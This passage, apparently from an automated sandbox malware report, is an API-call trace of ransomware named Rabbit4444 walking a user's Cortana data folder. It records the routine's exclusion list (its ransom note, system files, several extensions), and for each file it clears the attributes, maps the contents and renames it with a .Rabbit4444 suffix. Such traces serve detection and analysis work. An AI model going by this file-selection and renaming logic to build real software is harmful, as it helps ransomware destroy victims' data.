cFileName="0.1.filtertrie.intermediate.txt", cAlternateFileName="01FILT~1.TXT")) returned 1 [0067.602] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.602] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.602] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.602] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.602] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.602] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.602] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.602] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.602] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.602] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.602] lstrcmpiW (lpString1="0.1.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.602] lstrcpyW (in: lpString1=0x130ec64, lpString2="0.1.filtertrie.intermediate.txt" | out: lpString1="0.1.filtertrie.intermediate.txt") returned="0.1.filtertrie.intermediate.txt" [0067.602] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.1.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.603] lstrlenW (lpString="0.1.filtertrie.intermediate.txt") returned 31 [0067.603] lstrlenW (lpString="Rabbit4444") returned 10 [0067.603] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.603] lstrlenW (lpString=".dll") returned 4 [0067.603] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.603] lstrlenW (lpString=".lnk") returned 4 [0067.603] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.603] lstrlenW (lpString=".ini") returned 4 [0067.603] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.603] lstrlenW (lpString=".sys") returned 4 [0067.603] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.1.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.1.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.604] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.604] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15891472645) returned 1 [0067.604] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5) returned 1 [0067.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0067.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0067.604] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x29c [0067.606] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0067.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.608] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.608] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.608] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.608] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15891857921) returned 1 [0067.608] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0067.608] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0067.608] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.608] CloseHandle (hObject=0x29c) returned 1 [0067.608] CloseHandle (hObject=0x280) returned 1 [0067.608] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.1.filtertrie.intermediate.txt.Rabbit4444") returned 192 [0067.608] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.1.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.1.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.1.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.1.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.609] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4383156f, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x4383156f, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x4383156f, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0.2.filtertrie.intermediate.txt", cAlternateFileName="02FILT~1.TXT")) returned 1 [0067.609] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.609] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.609] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="Rabbit4444.exe") returned -1 [0067.609] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2=".") returned 1 [0067.609] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="..") returned 1 [0067.609] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="windows") returned -1 [0067.609] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="bootmgr") returned -1 [0067.609] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="pagefile.sys") returned -1 [0067.609] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="boot") returned -1 [0067.609] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="ids.txt") returned -1 [0067.609] lstrcmpiW (lpString1="0.2.filtertrie.intermediate.txt", lpString2="NTUSER.DAT") returned -1 [0067.609] lstrcpyW (in: lpString1=0x130ec64, lpString2="0.2.filtertrie.intermediate.txt" | out: lpString1="0.2.filtertrie.intermediate.txt") returned="0.2.filtertrie.intermediate.txt" [0067.609] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.2.filtertrie.intermediate.txt", dwFileAttributes=0x0) returned 1 [0067.611] lstrlenW (lpString="0.2.filtertrie.intermediate.txt") returned 31 [0067.611] lstrlenW (lpString="Rabbit4444") returned 10 [0067.611] lstrcmpiW (lpString1="ediate.txt", lpString2="Rabbit4444") returned -1 [0067.611] lstrlenW (lpString=".dll") returned 4 [0067.611] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0067.611] lstrlenW (lpString=".lnk") returned 4 [0067.611] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0067.611] lstrlenW (lpString=".ini") returned 4 [0067.611] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0067.611] lstrlenW (lpString=".sys") returned 4 [0067.611] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0067.611] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.2.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.2.filtertrie.intermediate.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.611] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.611] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15892200935) returned 1 [0067.611] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5) returned 1 [0067.611] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.611] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0067.611] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x29c [0067.613] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x70000 [0067.613] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.613] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.614] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0067.614] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0067.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.614] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15892469978) returned 1 [0067.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.614] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0067.614] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.614] CloseHandle (hObject=0x29c) returned 1 [0067.614] CloseHandle (hObject=0x280) returned 1 [0067.614] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.2.filtertrie.intermediate.txt.Rabbit4444") returned 192 [0067.614] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.2.filtertrie.intermediate.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.2.filtertrie.intermediate.txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.2.filtertrie.intermediate.txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\0.2.filtertrie.intermediate.txt.rabbit4444"), dwFlags=0x1) returned 1 [0067.615] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x439aeafc, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x439aeafc, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x453492ab, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x710f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps.ft", cAlternateFileName="")) returned 1 [0067.615] lstrcmpiW (lpString1="Apps.ft", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.615] lstrcmpiW (lpString1="Apps.ft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.615] lstrcmpiW (lpString1="Apps.ft", lpString2="Rabbit4444.exe") returned -1 [0067.615] lstrcmpiW (lpString1="Apps.ft", lpString2=".") returned 1 [0067.615] lstrcmpiW (lpString1="Apps.ft", lpString2="..") returned 1 [0067.615] lstrcmpiW (lpString1="Apps.ft", lpString2="windows") returned -1 [0067.615] lstrcmpiW (lpString1="Apps.ft", lpString2="bootmgr") returned -1 [0067.615] lstrcmpiW (lpString1="Apps.ft", lpString2="pagefile.sys") returned -1 [0067.615] lstrcmpiW (lpString1="Apps.ft", lpString2="boot") returned -1 [0067.615] lstrcmpiW (lpString1="Apps.ft", lpString2="ids.txt") returned -1 [0067.615] lstrcmpiW (lpString1="Apps.ft", lpString2="NTUSER.DAT") returned -1 [0067.615] lstrcpyW (in: lpString1=0x130ec64, lpString2="Apps.ft" | out: lpString1="Apps.ft") returned="Apps.ft" [0067.615] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\Apps.ft", dwFileAttributes=0x0) returned 1 [0067.616] lstrlenW (lpString="Apps.ft") returned 7 [0067.616] lstrlenW (lpString="Rabbit4444") returned 10 [0067.616] lstrcmpiW (lpString1="ꀀ", lpString2="Rabbit4444") returned 1 [0067.616] lstrlenW (lpString=".dll") returned 4 [0067.616] lstrcmpiW (lpString1="s.ft", lpString2=".dll") returned 1 [0067.616] lstrlenW (lpString=".lnk") returned 4 [0067.616] lstrcmpiW (lpString1="s.ft", lpString2=".lnk") returned 1 [0067.616] lstrlenW (lpString=".ini") returned 4 [0067.616] lstrcmpiW (lpString1="s.ft", lpString2=".ini") returned 1 [0067.616] lstrlenW (lpString=".sys") returned 4 [0067.616] lstrcmpiW (lpString1="s.ft", lpString2=".sys") returned 1 [0067.616] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\Apps.ft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\apps.ft"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.617] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.617] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15892760215) returned 1 [0067.617] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=28943) returned 1 [0067.617] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.617] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0067.617] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7410, lpName=0x0) returned 0x29c [0067.621] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7410) returned 0x70000 [0067.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0067.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0067.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.624] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15893515511) returned 1 [0067.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0067.625] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.625] CloseHandle (hObject=0x29c) returned 1 [0067.625] CloseHandle (hObject=0x280) returned 1 [0067.625] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\Apps.ft.Rabbit4444") returned 168 [0067.625] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\Apps.ft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\apps.ft"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\Apps.ft.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\apps.ft.rabbit4444"), dwFlags=0x1) returned 1 [0067.626] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da864c, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x35da864c, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x454541d3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x25cce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps.index", cAlternateFileName="APPS~1.IND")) returned 1 [0067.626] lstrcmpiW (lpString1="Apps.index", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.626] lstrcmpiW (lpString1="Apps.index", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.626] lstrcmpiW (lpString1="Apps.index", lpString2="Rabbit4444.exe") returned -1 [0067.626] lstrcmpiW (lpString1="Apps.index", lpString2=".") returned 1 [0067.626] lstrcmpiW (lpString1="Apps.index", lpString2="..") returned 1 [0067.626] lstrcmpiW (lpString1="Apps.index", lpString2="windows") returned -1 [0067.626] lstrcmpiW (lpString1="Apps.index", lpString2="bootmgr") returned -1 [0067.626] lstrcmpiW (lpString1="Apps.index", lpString2="pagefile.sys") returned -1 [0067.626] lstrcmpiW (lpString1="Apps.index", lpString2="boot") returned -1 [0067.626] lstrcmpiW (lpString1="Apps.index", lpString2="ids.txt") returned -1 [0067.626] lstrcmpiW (lpString1="Apps.index", lpString2="NTUSER.DAT") returned -1 [0067.626] lstrcpyW (in: lpString1=0x130ec64, lpString2="Apps.index" | out: lpString1="Apps.index") returned="Apps.index" [0067.626] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\Apps.index", dwFileAttributes=0x0) returned 1 [0067.627] lstrlenW (lpString="Apps.index") returned 10 [0067.627] lstrlenW (lpString="Rabbit4444") returned 10 [0067.627] lstrcmpiW (lpString1="Apps.index", lpString2="Rabbit4444") returned -1 [0067.627] lstrlenW (lpString=".dll") returned 4 [0067.627] lstrcmpiW (lpString1="ndex", lpString2=".dll") returned 1 [0067.627] lstrlenW (lpString=".lnk") returned 4 [0067.627] lstrcmpiW (lpString1="ndex", lpString2=".lnk") returned 1 [0067.627] lstrlenW (lpString=".ini") returned 4 [0067.627] lstrcmpiW (lpString1="ndex", lpString2=".ini") returned 1 [0067.627] lstrlenW (lpString=".sys") returned 4 [0067.627] lstrcmpiW (lpString1="ndex", lpString2=".sys") returned 1 [0067.627] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\Apps.index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\apps.index"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.627] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.628] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15893829176) returned 1 [0067.628] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=154830) returned 1 [0067.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0067.628] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25fd0, lpName=0x0) returned 0x29c [0067.631] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25fd0) returned 0x70000 [0067.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0067.638] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.638] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0067.638] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.638] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0067.638] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.638] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0067.638] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15894869406) returned 1 [0067.638] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.638] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0067.638] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.639] CloseHandle (hObject=0x29c) returned 1 [0067.640] CloseHandle (hObject=0x280) returned 1 [0067.640] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\Apps.index.Rabbit4444") returned 171 [0067.640] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\Apps.index" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\apps.index"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\Apps.index.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\apps.index.rabbit4444"), dwFlags=0x1) returned 1 